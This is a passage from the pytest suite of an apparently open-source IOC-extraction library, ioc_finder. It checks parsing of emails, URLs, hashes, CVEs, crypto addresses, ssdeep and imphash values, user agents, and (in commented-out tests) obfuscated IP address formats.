def test_email_address_parsing(): 48 | s = "test@a.com bingo@en.wikipedia.com foo@a.com'.format('a'*63 bar@b.a.com'.format('a'*63, 'a'*63 bad@test-ing.com me@2600.com john.smith(comment)@example.com (comment)john.smith@example.com \"John..Doe\"@example.com' test@[192.168.0.1]" 49 | 50 | iocs = find_iocs(s)["email_addresses_complete"] 51 | print(iocs) 52 | assert len(iocs) == 10 53 | assert "test@a.com" in iocs 54 | assert "bingo@en.wikipedia.com" in iocs 55 | assert "foo@a.com" in iocs 56 | assert "bar@b.a.com" in iocs 57 | assert "bad@test-ing.com" in iocs 58 | assert "me@2600.com" in iocs 59 | assert "john.smith(comment)@example.com" in iocs 60 | assert "(comment)john.smith@example.com" in iocs 61 | assert '"John..Doe"@example.com' in iocs 62 | assert "test@[192.168.0.1]" in iocs 63 | 64 | iocs = find_iocs("a@example.com") 65 | assert iocs["email_addresses_complete"][0] == "a@example.com" 66 | 67 | 68 | def test_complex_email_address_parsing(): 69 | s = "john.smith(comment)@example.com" 70 | iocs = find_iocs(s) 71 | assert "john.smith(comment)@example.com" in iocs["email_addresses_complete"] 72 | 73 | 74 | def test_simple_email_address_parsing(): 75 | s = "test@a.com bingo@en.wikipedia.com foo@a.com'.format('a'*63 bar@b.a.com'.format('a'*63, 'a'*63 bad@test-ing.com me@2600.com john.smith(comment)@example.com (comment)john.smith@example.com \"John..Doe\"@example.com' test@[192.168.0.1]" 76 | 77 | iocs = find_iocs(s) 78 | assert len(iocs["email_addresses"]) == 8 79 | assert "test@a.com" in iocs["email_addresses"] 80 | assert "bingo@en.wikipedia.com" in iocs["email_addresses"] 81 | assert "foo@a.com" in iocs["email_addresses"] 82 | assert "bar@b.a.com" in iocs["email_addresses"] 83 | assert "bad@test-ing.com" in iocs["email_addresses"] 84 | assert "me@2600.com" in iocs["email_addresses"] 85 | assert "john.smith@example.com" in iocs["email_addresses"] 86 | assert "test@[192.168.0.1]" in iocs["email_addresses"] 87 | 88 | iocs = find_iocs("a@example.com") 89 | assert 
iocs["email_addresses"][0] == "a@example.com" 90 | 91 | 92 | def test_url_parsing(): 93 | invalid_urls = [ 94 | "foo@{}.com".format("a" * 64), 95 | "!@.com", 96 | "foo@abc", 97 | "@@@@-hi-.com", 98 | "@_hi_.com", 99 | "me@*hi*.com", 100 | "foo{}.com".format("a" * 64), 101 | ".com", 102 | "abc", 103 | "-hi-.com", 104 | "_hi_.com", 105 | "*hi*.com", 106 | ] 107 | 108 | valid_urls = [ 109 | "https://a.com", 110 | "https://en.wikipedia.com", 111 | "https://{}.com".format("a" * 63), 112 | "https://{}.{}.com".format("a" * 63, "a" * 63), 113 | "https://test-ing.com", 114 | "https://2600.com", 115 | "https://example.com", 116 | "http://example.com", 117 | "ftp://example.com", 118 | ] 119 | 120 | iocs = find_iocs(" ".join(valid_urls)) 121 | assert len(iocs["urls"]) == 9 122 | # make sure domains are being parsed from the valid urls as well 123 | assert len(iocs["domains"]) == 7 124 | 125 | iocs = find_iocs(" ".join(invalid_urls)) 126 | assert len(iocs["urls"]) == 0 127 | 128 | s = "http://8pretgdl.r.us-east-1.awstrack.me/L0/http:%2F%2Fwww.excelgoodies.com%2Fexcel-vba-training-in-virginia%23course-content/1/0100016ed23f4bef-b14931bd-26f6-4130-9c37-c4f9902a771d-000000/mHJBuJ8D1RcIDE3jrWkdw4I9im4=138" 129 | iocs = find_iocs(s) 130 | print(iocs["urls"]) 131 | assert iocs["urls"] == [ 132 | "http://8pretgdl.r.us-east-1.awstrack.me/L0/http:%2F%2Fwww.excelgoodies.com%2Fexcel-vba-training-in-virginia%23course-content/1/0100016ed23f4bef-b14931bd-26f6-4130-9c37-c4f9902a771d-000000/mHJBuJ8D1RcIDE3jrWkdw4I9im4=138" 133 | ] 134 | 135 | s = "https://www.virustotal.com/gui/file/2f3ec0e4998909bb0efab13c82d30708ca9f88679e42b75ef13ea0466951d862/detection" 136 | iocs = find_iocs(s) 137 | assert iocs["sha256s"] == ["2f3ec0e4998909bb0efab13c82d30708ca9f88679e42b75ef13ea0466951d862"] 138 | 139 | # this was implemented for https://github.com/fhightower/ioc-finder/issues/87 140 | s = "https://www.virustotal.com/gui/file/2f3ec0e4998909bb0efab13c82d30708ca9f88679e42b75ef13ea0466951d862/detection" 
141 | iocs = find_iocs(s, parse_from_url_path=False) 142 | assert iocs["sha256s"] == [] 143 | 144 | # this was implemented for https://github.com/fhightower/ioc-finder/issues/87 145 | s = "https://www.virustotal.com/gui/file/2f3ec0e4998909bb0efab13c82d30708ca9f88679e42b75ef13ea0466951d862/detection" 146 | iocs = find_iocs(s, parse_from_url_path=False, parse_urls_without_scheme=False) 147 | assert iocs["urls"] == [ 148 | "https://www.virustotal.com/gui/file/2f3ec0e4998909bb0efab13c82d30708ca9f88679e42b75ef13ea0466951d862/detection" 149 | ] 150 | assert iocs["sha256s"] == [] 151 | 152 | 153 | def test_file_hash_parsing(): 154 | s = "{} {} {} {} {}".format("A" * 32, "a" * 32, "b" * 40, "c" * 64, "d" * 128) 155 | iocs = find_iocs(s) 156 | assert len(iocs["md5s"]) == 1 157 | assert len(iocs["sha1s"]) == 1 158 | assert len(iocs["sha256s"]) == 1 159 | assert len(iocs["sha512s"]) == 1 160 | 161 | 162 | def test_cve_parsing(): 163 | s = "cve-2014-1000 cve 2014-1001 cve-1999-1002 CVE 2999-1003 CVE 1928-1004" 164 | iocs = find_iocs(s) 165 | assert len(iocs["cves"]) == 5 166 | assert "CVE-2014-1000" in iocs["cves"] 167 | assert "CVE-2014-1001" in iocs["cves"] 168 | assert "CVE-1999-1002" in iocs["cves"] 169 | assert "CVE-2999-1003" in iocs["cves"] 170 | assert "CVE-1928-1004" in iocs["cves"] 171 | 172 | 173 | def test_ipv4_cidr_parsing(): 174 | s = "1.2.3.4/0 1.2.3.4/10 1.2.3.4/20 1.2.3.4/32" 175 | iocs = find_iocs(s) 176 | assert len(iocs["ipv4_cidrs"]) == 4 177 | assert "1.2.3.4/0" in iocs["ipv4_cidrs"] 178 | assert "1.2.3.4/10" in iocs["ipv4_cidrs"] 179 | assert "1.2.3.4/20" in iocs["ipv4_cidrs"] 180 | assert "1.2.3.4/32" in iocs["ipv4_cidrs"] 181 | 182 | s = "1.2.3.4/0 1.2.3.4/10 1.2.3.4/20 1.2.3.4/32" 183 | iocs = find_iocs(s, parse_address_from_cidr=False) 184 | assert len(iocs["ipv4_cidrs"]) == 4 185 | assert len(iocs["ipv4s"]) == 0 186 | 187 | 188 | def test_registry_key_parsing(): 189 | s = r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows 
HKLM\Software\Microsoft\Windows HKCC\Software\Microsoft\Windows" 190 | iocs = find_iocs(s) 191 | assert sorted( 192 | [ 193 | r"HKEY_LOCAL_MACHINE\Software\Microsoft\Windows", 194 | r"HKLM\Software\Microsoft\Windows", 195 | r"HKCC\Software\Microsoft\Windows", 196 | ] 197 | ) == sorted(iocs["registry_key_paths"]) 198 | 199 | 200 | def test_adsense_publisher_id_parsing(): 201 | s = "pub-1234567891234567" 202 | iocs = find_iocs(s) 203 | assert len(iocs["google_adsense_publisher_ids"]) == 1 204 | iocs["google_adsense_publisher_ids"][0] == "pub-1234567891234567" 205 | 206 | s = "pub-1234567891234567 pub-9383614236930773" 207 | iocs = find_iocs(s) 208 | assert len(iocs["google_adsense_publisher_ids"]) == 2 209 | assert "pub-1234567891234567" in iocs["google_adsense_publisher_ids"] 210 | assert "pub-9383614236930773" in iocs["google_adsense_publisher_ids"] 211 | 212 | 213 | def test_analytics_publisher_id_parsing(): 214 | s = "UA-000000-2" 215 | iocs = find_iocs(s) 216 | assert len(iocs["google_analytics_tracker_ids"]) == 1 217 | assert iocs["google_analytics_tracker_ids"][0] == "UA-000000-2" 218 | 219 | s = "UA-000000-2 UA-00000000-99" 220 | iocs = find_iocs(s) 221 | assert len(iocs["google_analytics_tracker_ids"]) == 2 222 | assert "UA-000000-2" in iocs["google_analytics_tracker_ids"] 223 | assert "UA-00000000-99" in iocs["google_analytics_tracker_ids"] 224 | 225 | 226 | def test_bitcoin_parsing(): 227 | s = """1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2. 228 | P2SH type starting with the number 3, eg: 3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy. 
229 | Bech32 type starting with bc1, eg: bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq""" 230 | iocs = find_iocs(s) 231 | assert len(iocs["bitcoin_addresses"]) == 3 232 | assert "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2" in iocs["bitcoin_addresses"] 233 | assert "3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy" in iocs["bitcoin_addresses"] 234 | assert "bc1qar0srrr7xfkvy5l643lydnw9re59gtzzwf5mdq" in iocs["bitcoin_addresses"] 235 | 236 | 237 | def test_xmpp_address_parsing(): 238 | s = """foo@swissjabber.de bar@jabber.zone bom@jabber.sow.as me@example.com""" 239 | iocs = find_iocs(s) 240 | assert len(iocs["xmpp_addresses"]) == 3 241 | assert "foo@swissjabber.de" in iocs["xmpp_addresses"] 242 | assert "bar@jabber.zone" in iocs["xmpp_addresses"] 243 | assert "bom@jabber.sow.as" in iocs["xmpp_addresses"] 244 | assert len(iocs["domains"]) == 4 245 | # make sure the xmpp addresses are not also parsed as email addresses 246 | assert len(iocs["email_addresses"]) == 1 247 | 248 | iocs = find_iocs(s, parse_domain_name_from_xmpp_address=False) 249 | assert len(iocs["xmpp_addresses"]) == 3 250 | assert "foo@swissjabber.de" in iocs["xmpp_addresses"] 251 | assert "bar@jabber.zone" in iocs["xmpp_addresses"] 252 | assert "bom@jabber.sow.as" in iocs["xmpp_addresses"] 253 | assert len(iocs["domains"]) == 1 254 | # make sure the xmpp addresses are not also parsed as email addresses 255 | assert len(iocs["email_addresses"]) == 1 256 | 257 | 258 | def test_mac_address_parsing(): 259 | s = "AA-F2-C9-A6-B3-4F AB:F2:C9:A6:B3:4F ACF2.C9A6.B34F" 260 | 261 | iocs = find_iocs(s) 262 | assert len(iocs["mac_addresses"]) == 3 263 | assert "AA-F2-C9-A6-B3-4F" in iocs["mac_addresses"] 264 | assert "AB:F2:C9:A6:B3:4F" in iocs["mac_addresses"] 265 | assert "ACF2.C9A6.B34F" in iocs["mac_addresses"] 266 | 267 | # same thing, just lower-case 268 | s = "aa-f2-c9-a6-b3-4f ab:f2:c9:a6:b3:4f acf2.c9a6.b34f" 269 | iocs = find_iocs(s) 270 | assert len(iocs["mac_addresses"]) == 3 271 | assert "aa-f2-c9-a6-b3-4f" in 
iocs["mac_addresses"] 272 | assert "ab:f2:c9:a6:b3:4f" in iocs["mac_addresses"] 273 | assert "acf2.c9a6.b34f" in iocs["mac_addresses"] 274 | 275 | 276 | def test_ssdeep_parsing(): 277 | s = "1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U" 278 | iocs = find_iocs(s) 279 | assert len(iocs["ssdeeps"]) == 1 280 | assert iocs["ssdeeps"][0] == "1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U" 281 | 282 | s = "ahdfadsfa 1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U,000/000/000000001 adfasf" 283 | iocs = find_iocs(s) 284 | assert len(iocs["ssdeeps"]) == 1 285 | assert iocs["ssdeeps"][0] == "1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U" 286 | 287 | s = """c2b257868686c861d43c6cf3de146b8812778c8283f7d 288 | Threat Zepakab/Zebrocy Downloader 289 | ssdeep 12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F""" 290 | iocs = find_iocs(s) 291 | assert len(iocs["ssdeeps"]) == 1 292 | assert iocs["ssdeeps"][0] == "12288:QYV6MorX7qzuC3QHO9FQVHPF51jgcSj2EtPo/V7I6R+Lqaw8i6hG0:vBXu9HGaVHh4Po/VU6RkqaQ6F" 293 | 294 | s = """393216:EW/eKCo9QgoHfHYebwoyC0QStQYEb+G8j3wfVOglnimQyCK+mteYREDWXKF2b:MKg3lbwoyCnCkNHlnimfCSQx8b,"000/000/000000001" 295 | 196608:AGSE26mYSK0iwH8HW9TDl0vnvCZwZEkzzeap7R:Ak28siwH8eRSn25k3eg,"000/000/000000002" 296 | 98304:O1OCzezOgr4XMP7Af0+Kh7MzplFKuu5XcS9QnCD/VWR6yf4OB6S/mwRTwjf0ih87:k/Y4XMT7YguEXqCD/VWR6yf4Ux/mwR0S,"000/000/000000003" 297 | 96:ukILJhn54RewghSib4xGEHVLFNs+4tihJW6jJenUQrsIvpMMjUg:uk0Jx54usxJHh4gJrJenUQrs2pvIg,"000/000/000000004" 298 | 196608:rNI4QlKQbWQobu0u3QRBBibfv+Z4Hjy5M+IjunAadLLtt42fAtQSqFhx:rNkK2obu0uBb3K4H28yAGc4RSax,"000/000/000000005" 299 | 1536:mFbhArcCMbR0S/kjzU6El4mUIR2JPmvY3lpKa38fTXcTns+b3tfZyCLtRs:obNCMbWpU6SzFAPV3lpCjCsQRZyQt6,"000/000/000000006" 300 | 48:CScrEd3jk5BsRSFCWfVsEWABbbpnWSgSX45dc6b5Qla9A+o5R6k7CyNRD5J:XcrEdzHRSFr9sE7XnsDe1CyNRNJ,"000/000/000000007" 301 | 
24:N8Rw5AF4REesFtPP6k216xoWya1oxOKHHwa8peRK8FdigZY5tODrRRK8RfMfde8:N8Rw5AF4+XPyooa2EKnwaGeRJFYpfwzQ,"000/000/000000008" 302 | 1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U,"000/000/000000009""" 303 | iocs = find_iocs(s) 304 | assert len(iocs["ssdeeps"]) == 9 305 | assert ( 306 | "393216:EW/eKCo9QgoHfHYebwoyC0QStQYEb+G8j3wfVOglnimQyCK+mteYREDWXKF2b:MKg3lbwoyCnCkNHlnimfCSQx8b" 307 | in iocs["ssdeeps"] 308 | ) 309 | assert "196608:AGSE26mYSK0iwH8HW9TDl0vnvCZwZEkzzeap7R:Ak28siwH8eRSn25k3eg" in iocs["ssdeeps"] 310 | assert ( 311 | "98304:O1OCzezOgr4XMP7Af0+Kh7MzplFKuu5XcS9QnCD/VWR6yf4OB6S/mwRTwjf0ih87:k/Y4XMT7YguEXqCD/VWR6yf4Ux/mwR0S" 312 | in iocs["ssdeeps"] 313 | ) 314 | assert "96:ukILJhn54RewghSib4xGEHVLFNs+4tihJW6jJenUQrsIvpMMjUg:uk0Jx54usxJHh4gJrJenUQrs2pvIg" in iocs["ssdeeps"] 315 | assert ( 316 | "196608:rNI4QlKQbWQobu0u3QRBBibfv+Z4Hjy5M+IjunAadLLtt42fAtQSqFhx:rNkK2obu0uBb3K4H28yAGc4RSax" in iocs["ssdeeps"] 317 | ) 318 | assert ( 319 | "1536:mFbhArcCMbR0S/kjzU6El4mUIR2JPmvY3lpKa38fTXcTns+b3tfZyCLtRs:obNCMbWpU6SzFAPV3lpCjCsQRZyQt6" 320 | in iocs["ssdeeps"] 321 | ) 322 | assert ( 323 | "48:CScrEd3jk5BsRSFCWfVsEWABbbpnWSgSX45dc6b5Qla9A+o5R6k7CyNRD5J:XcrEdzHRSFr9sE7XnsDe1CyNRNJ" in iocs["ssdeeps"] 324 | ) 325 | assert ( 326 | "24:N8Rw5AF4REesFtPP6k216xoWya1oxOKHHwa8peRK8FdigZY5tODrRRK8RfMfde8:N8Rw5AF4+XPyooa2EKnwaGeRJFYpfwzQ" 327 | in iocs["ssdeeps"] 328 | ) 329 | assert "1536:yB+A8bMtMeRlbIzvDqZL4QzNxVDm+5gt+M2hDDDvNZ3YZ7sU:N4tMsbOGcyrV6BQvnoZ4U" in iocs["ssdeeps"] 330 | 331 | 332 | def test_imphash_parsing(): 333 | names = ["imphash", "import hash"] 334 | templates = [ 335 | """SHA-256 093e394933c4545ba7019f511961b9a5ab91156cf791f45de074acad03d1a44a 336 | Dropper {}: 18ddf28a71089acdbab5038f58044c0a 337 | C2 IP: 210.209.127.8:443""", 338 | "{}: 18ddf28a71089acdbab5038f58044c0a", 339 | "{} 18ddf28a71089acdbab5038f58044c0a", 340 | "{} 18ddf28a71089acdbab5038f58044c0a", 341 | "{}: 18ddf28a71089acdbab5038f58044c0a", 342 | 
"{}\t18ddf28a71089acdbab5038f58044c0a", 343 | "{}\n18ddf28a71089acdbab5038f58044c0a", 344 | "{} - 18ddf28a71089acdbab5038f58044c0a", 345 | ] 346 | 347 | for template in templates: 348 | for name in names: 349 | print(template) 350 | iocs = find_iocs(template.format(name)) 351 | assert len(iocs["imphashes"]) == 1 352 | assert iocs["imphashes"] == ["18ddf28a71089acdbab5038f58044c0a"] 353 | assert len(iocs["md5s"]) == 0 354 | 355 | iocs = find_iocs(template.format(name.upper())) 356 | assert len(iocs["imphashes"]) == 1 357 | assert iocs["imphashes"] == ["18ddf28a71089acdbab5038f58044c0a"] 358 | assert len(iocs["md5s"]) == 0 359 | 360 | 361 | def test_authentihash(): 362 | names = ["authentihash"] 363 | templates = [ 364 | "{} 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 365 | "{} 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 366 | "{}: 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 367 | "{}: 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 368 | "{} - 3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 369 | "{}-3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 370 | "{}\t3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 371 | "{}\n3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4", 372 | ] 373 | 374 | for template in templates: 375 | for name in names: 376 | print(template) 377 | iocs = find_iocs(template.format(name)) 378 | assert len(iocs["authentihashes"]) == 1 379 | assert iocs["authentihashes"] == ["3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4"] 380 | assert len(iocs["sha256s"]) == 0 381 | 382 | iocs = find_iocs(template.format(name.upper())) 383 | assert len(iocs["authentihashes"]) == 1 384 | assert iocs["authentihashes"] == ["3f1b149d07e7e8636636b8b7f7043c40ed64a10b28986181fb046c498432c2d4"] 385 | assert len(iocs["sha256s"]) == 0 386 | 387 | 388 | def test_user_agents(): 389 | s = "Mozilla/4.0 
(compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)" 390 | iocs = find_iocs(s) 391 | assert len(iocs["user_agents"]) == 1 392 | assert iocs["user_agents"] == ["Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; InfoPath.1)"] 393 | 394 | s = "mozilla/5.0 (windows nt 6.1; wow64) applewebkit/535.11 (khtml, like gecko) chrome/17.0.963.56 safari/535.11 mozilla/5.0 (windows nt 6.1; wow64; rv:11.0) gecko firefox/11.0" 395 | iocs = find_iocs(s) 396 | assert len(iocs["user_agents"]) == 2 397 | assert ( 398 | "mozilla/5.0 (windows nt 6.1; wow64) applewebkit/535.11 (khtml, like gecko) chrome/17.0.963.56 safari/535.11" 399 | in iocs["user_agents"] 400 | ) 401 | assert "mozilla/5.0 (windows nt 6.1; wow64; rv:11.0) gecko firefox/11.0" in iocs["user_agents"] 402 | 403 | # test the same thing as above but with different casing to make sure the cases are matched and maintained properly 404 | s = "Mozilla/5.0 (Windows nt 6.1; wow64) Applewebkit/535.11 (khtml, like Gecko) Chrome/17.0.963.56 Safari/535.11 Mozilla/5.0 (Windows nt 6.1; wow64; rv:11.0) Gecko Firefox/11.0" 405 | iocs = find_iocs(s) 406 | assert len(iocs["user_agents"]) == 2 407 | assert ( 408 | "Mozilla/5.0 (Windows nt 6.1; wow64) Applewebkit/535.11 (khtml, like Gecko) Chrome/17.0.963.56 Safari/535.11" 409 | in iocs["user_agents"] 410 | ) 411 | assert "Mozilla/5.0 (Windows nt 6.1; wow64; rv:11.0) Gecko Firefox/11.0" in iocs["user_agents"] 412 | 413 | 414 | def test_monero_addresses(): 415 | result = find_iocs( 416 | "496aKKdqF1xQSSEzw7wNrkZkDUsCD5cSmNCfVhVgEps52WERBcLDGzdF5UugmFoHMm9xRJdewvK2TFfAJNwEV25rTcVF5Vp" 417 | ) 418 | assert result["monero_addresses"] == [ 419 | "496aKKdqF1xQSSEzw7wNrkZkDUsCD5cSmNCfVhVgEps52WERBcLDGzdF5UugmFoHMm9xRJdewvK2TFfAJNwEV25rTcVF5Vp" 420 | ] 421 | 422 | s = "49Bmp3SfddJRRGNW7GhHyAA2JgcYmZ4EGEix6p3eMNFCd15P2VsK9BHWcZWUNYF3nhf17MoRTRK4j5b7FUMA9zanSn9D3Nk 498s2XeKWYSEhQHGxdMULWdrpaKvSkDsq4855mCuksNL6ez2dk4mMQm8epbr9xvn5LgLPzD5uL9EGeRqWUdEZha1HmZqcyh" 423 
| result = find_iocs(s) 424 | assert ( 425 | "49Bmp3SfddJRRGNW7GhHyAA2JgcYmZ4EGEix6p3eMNFCd15P2VsK9BHWcZWUNYF3nhf17MoRTRK4j5b7FUMA9zanSn9D3Nk" 426 | in result["monero_addresses"] 427 | ) 428 | assert ( 429 | "498s2XeKWYSEhQHGxdMULWdrpaKvSkDsq4855mCuksNL6ez2dk4mMQm8epbr9xvn5LgLPzD5uL9EGeRqWUdEZha1HmZqcyh" 430 | in result["monero_addresses"] 431 | ) 432 | -------------------------------------------------------------------------------- /tests/test_odd_ip_address_formats.py: -------------------------------------------------------------------------------- 1 | # from ioc_finder import find_iocs 2 | 3 | 4 | # def test_leading_zero(): 5 | # """Sections of IP addresses that start with a leading zero should be interpreted as being in base 8.""" 6 | # s = '0177.0.0.01' 7 | # results = find_iocs(s) 8 | # assert results['ipv4s'] == ['127.0.0.1'] 9 | 10 | # s = '226.000.000.037' 11 | # results = find_iocs(s) 12 | # assert results['ipv4s'] == ['226.0.0.31'] 13 | 14 | # s = '014.0.0.01' 15 | # results = find_iocs(s) 16 | # assert results['ipv4s'] == ['12.0.0.1'] 17 | 18 | # # because `018` (the first section of the ip below) is not a valid octal number, it should not be converted 19 | # s = '018.0.0.01' 20 | # results = find_iocs(s) 21 | # assert results['ipv4s'] == ['18.0.0.1'] 22 | 23 | 24 | # def test_a_b_c_format(): 25 | # results = find_iocs('111.111.1111') 26 | # assert results['ipv4s'] == ['111.111.4.87'] 27 | 28 | # results = find_iocs('10.0.514') 29 | # assert results['ipv4s'] == ['10.0.2.2'] 30 | 31 | # # here is some code to show how sections c and d of dotted decimal form are calculated from the given examples: 32 | # # x = 1111 33 | # # print(f'{x // 256}.{(x - 256) % 256}') 34 | 35 | 36 | # def test_a_b_format(): 37 | # results = find_iocs('1.300') 38 | # assert results['ipv4s'] == ['1.0.1.44'] 39 | 40 | # results = find_iocs('1.256') 41 | # assert results['ipv4s'] == ['1.0.1.0'] 42 | 43 | # results = find_iocs('1.15') 44 | # assert results['ipv4s'] == ['1.0.0.15'] 
45 | 46 | # results = find_iocs('1.65793') 47 | # assert results['ipv4s'] == ['1.1.1.1'] 48 | 49 | # results = find_iocs('1.67794') 50 | # assert results['ipv4s'] == ['1.1.8.210'] 51 | 52 | 53 | # def test_numeric_forms(): 54 | # # these examples are from: https://bugzilla.mozilla.org/show_bug.cgi?id=67730 55 | 56 | # s = 'http://3486011863' 57 | # results = find_iocs(s) 58 | # assert results['ipv4s'] == ['207.200.81.215'] 59 | 60 | # s = 'http://00000000317.00000000310.00000000121.00000000327/' 61 | # results = find_iocs(s) 62 | # assert results['ipv4s'] == ['207.200.81.215'] 63 | 64 | # s = 'http://4294967503.4294967496.4294967377.4294967511/' 65 | # results = find_iocs(s) 66 | # assert results['ipv4s'] == ['207.200.81.215'] 67 | 68 | 69 | # def test_real_obfuscated_forms(): 70 | # # these examples come from: https://securelist.com/new-brazilian-banking-trojans-recycle-old-url-obfuscation-tricks/29558/ 71 | 72 | # s = 'http://0x42.0x66.0x0d.0x63' 73 | # results = find_iocs(s) 74 | # assert results['ipv4s'] == ['66.102.13.99'] 75 | 76 | # s = 'http://0x42660d63' 77 | # results = find_iocs(s) 78 | # assert results['ipv4s'] == ['66.102.13.99'] 79 | 80 | # s = 'http://1113984355' 81 | # results = find_iocs(s) 82 | # assert results['ipv4s'] == ['66.102.13.99'] 83 | 84 | # s = 'http://00000102.00000146.00000015.00000143' 85 | # results = find_iocs(s) 86 | # assert results['ipv4s'] == ['66.102.13.99'] 87 | -------------------------------------------------------------------------------- /tests/test_parsing_functions.py: -------------------------------------------------------------------------------- 1 | """Make sure that the parsing functions for specific functions are imported properly.""" 2 | 3 | from ioc_finder import parse_urls 4 | 5 | 6 | def test_url_parsing_func(): 7 | results = parse_urls("https://google.com") 8 | assert results == ["https://google.com"] 9 | -------------------------------------------------------------------------------- /tests/test_urls.py: 
-------------------------------------------------------------------------------- 1 | """Test the URL parsing against the urls here: https://mathiasbynens.be/demo/url-regex.""" 2 | 3 | from d8s_lists import iterables_have_same_items 4 | 5 | from ioc_finder import find_iocs 6 | 7 | # VALID_URLS = [ 8 | # 'http://foo.com/blah_blah', 9 | # 'http://foo.com/blah_blah/', 10 | # 'http://foo.com/blah_blah_(wikipedia)', 11 | # 'http://foo.com/blah_blah_(wikipedia)_(again)', 12 | # 'http://www.example.com/wpstyle/?p=364', 13 | # 'https://www.example.com/foo/?bar=baz&inga=42&quux', 14 | # 'http://✪df.ws/123', 15 | # 'http://userid:password@example.com:8080', 16 | # 'http://userid:password@example.com:8080/', 17 | # 'http://userid@example.com', 18 | # 'http://userid@example.com/', 19 | # 'http://userid@example.com:8080', 20 | # 'http://userid@example.com:8080/', 21 | # 'http://userid:password@example.com', 22 | # 'http://userid:password@example.com/', 23 | # 'http://142.42.1.1/', 24 | # 'http://142.42.1.1:8080/', 25 | # 'http://➡.ws/䨹', 26 | # 'http://⌘.ws', 27 | # 'http://⌘.ws/', 28 | # 'http://foo.com/blah_(wikipedia)#cite-1', 29 | # 'http://foo.com/blah_(wikipedia)_blah#cite-1', 30 | # 'http://foo.com/unicode_(✪)_in_parens', 31 | # 'http://foo.com/(something)?after=parens', 32 | # 'http://☺.damowmow.com/', 33 | # 'http://code.google.com/events/#&product=browser', 34 | # 'http://j.mp', 35 | # 'ftp://foo.bar/baz', 36 | # 'http://foo.bar/?q=Test%20URL-encoded%20stuff', 37 | # 'http://مثال.إختبار', 38 | # 'http://例子.测试', 39 | # 'http://उदाहरण.परीक्षा', 40 | # "http://-.~_!$&'()*+,;=:%40:80%2f::::::@example.com", 41 | # 'http://1337.net', 42 | # 'http://a.b-c.de', 43 | # 'http://223.255.255.254', 44 | # ] 45 | 46 | 47 | # def test_url_parsing(): 48 | # for url in VALID_URLS: 49 | # iocs = find_iocs(url) 50 | # try: 51 | # assert len(iocs['urls']) == 1 52 | # assert iocs['urls'][0] == url 53 | # except AssertionError as e: 54 | # print('failed on url: {}'.format(url)) 55 | # raise 
e 56 | 57 | 58 | # INVALID_URLS = [ 59 | # 'http://', 60 | # 'http://.', 61 | # 'http://..', 62 | # 'http://../', 63 | # 'http://?', 64 | # 'http://??', 65 | # 'http://??/', 66 | # 'http://#', 67 | # 'http://##', 68 | # 'http://##/', 69 | # '//', 70 | # '//a', 71 | # '///a', 72 | # '///', 73 | # 'http:///a', 74 | # 'foo.com', 75 | # 'rdar://1234', 76 | # 'h://test', 77 | # ':// should fail', 78 | # 'ftps://foo.bar/', 79 | # 'http://-error-.invalid/', 80 | # 'http://a.b--c.de/', 81 | # 'http://-a.b.co', 82 | # 'http://a.b-.co', 83 | # 'http://0.0.0.0', 84 | # 'http://10.1.1.0', 85 | # 'http://10.1.1.255', 86 | # 'http://224.1.1.1', 87 | # 'http://1.1.1.1.1', 88 | # 'http://123.123.123', 89 | # 'http://3628126748', 90 | # 'http://.www.foo.bar/', 91 | # 'http://www.foo.bar./', 92 | # 'http://.www.foo.bar./', 93 | # 'http://10.1.1.1', 94 | # ] 95 | 96 | 97 | # def test_invalid_urls(): 98 | # for url in INVALID_URLS: 99 | # iocs = find_iocs(url) 100 | # assert len(iocs['urls']) == 0 101 | 102 | 103 | def test_cidr_ranges_not_found_as_urls(): 104 | """See https://github.com/fhightower/ioc-finder/issues/91.""" 105 | result = find_iocs("1.1.1.1/0") 106 | assert result["urls"] == [] 107 | 108 | result = find_iocs("1.1.1.1/0", parse_urls_without_scheme=False) 109 | assert result["urls"] == [] 110 | 111 | result = find_iocs("1.1.1.1/0 foobar.com/test/bingo.php") 112 | assert result["urls"] == ["foobar.com/test/bingo.php"] 113 | 114 | 115 | def test_parse_domain_from_url_not_removing_entire_url(): 116 | """See https://github.com/fhightower/ioc-finder/issues/90.""" 117 | # default behaviour 118 | result = find_iocs("https://foobar.com/test/bingo.com/bar") 119 | assert iterables_have_same_items(result["domains"], ["foobar.com", "bingo.com"]) 120 | 121 | result = find_iocs("https://foobar.com/test/bingo.com/bar", parse_domain_from_url=False) 122 | assert result["domains"] == ["bingo.com"] 123 | 124 | result = find_iocs("https://foobar.com/test/bingo.com/bar", 
